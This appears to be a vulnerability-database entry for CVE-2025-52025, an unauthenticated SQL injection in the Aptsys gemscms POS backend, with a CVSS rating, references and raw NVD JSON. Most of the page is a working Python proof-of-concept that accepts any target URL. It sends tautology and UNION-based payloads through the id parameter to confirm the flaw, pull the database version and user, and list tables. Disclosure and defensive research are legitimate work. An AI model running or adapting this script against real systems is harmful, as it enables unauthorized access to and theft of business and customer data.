CVE-2025-52025

Description

An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:* - VULNERABLE

Aptsys gemscms POS Platform <= 2025-05-28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-52025 SQL Injection PoC
# Target: Aptsys gemscms POS Platform GetServiceByRestaurantID endpoint

def exploit_sqli(target_url, payload):
    """
    Send SQL injection payload to the vulnerable endpoint
    """
    params = {'id': payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def test_basic_sqli(target_url):
    """
    Test basic SQL injection with error-based technique
    """
    # Basic injection to trigger SQL error and confirm vulnerability
    payload = "1' OR '1'='1"
    print(f"[*] Testing basic SQL injection...")
    print(f"[*] Payload: {payload}")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Response length: {len(result)}")
    return result

def extract_database_info(target_url):
    """
    Extract database version and name using UNION-based injection
    """
    # Payload to extract database version
    payload = "1' UNION SELECT NULL,version(),user(),database()-- -"
    print(f"[*] Extracting database information...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Database info: {result[:500]}")
    return result

def extract_tables(target_url):
    """
    Extract table names from database
    """
    # Payload to list all tables
    payload = "1' UNION SELECT NULL,table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"[*] Extracting table names...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Tables found: {result[:500]}")
    return result

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-52025_poc.py <target_url>")
        print("Example: python cve-2025-52025_poc.py http://target.com/api/GetServiceByRestaurantID")
        sys.exit(1)
    
    target_url = sys.argv[1]
    print(f"[*] Target: {target_url}")
    print(f"[*] CVE-2025-52025 SQL Injection PoC")
    print("=" * 50)
    
    # Test vulnerability
    test_basic_sqli(target_url)
    print("=" * 50)
    
    # Extract database information
    extract_database_info(target_url)
    print("=" * 50)
    
    # Extract tables
    extract_tables(target_url)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52025
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52025
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52025/
[4] VulDB https://vuldb.com/cve/CVE-2025-52025
[5] http://aptsys.com
[6] https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52025", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.710", "lastModified": "2026-02-11T19:24:10.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL existe en el endpoint GetServiceByRestaurantID del backend de la plataforma POS Aptsys gemscms hasta el 28-05-2025. La vulnerabilidad surge porque la entrada del usuario se inserta directamente en una sintaxis de consulta SQL dinámica sin una sanitización o parametrización adecuadas. Esto permite a un atacante inyectar y ejecutar código SQL arbitrario al enviar una entrada manipulada en el parámetro id, lo que lleva a un acceso o modificación de datos no autorizados."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory", "Mitigation"]}]}}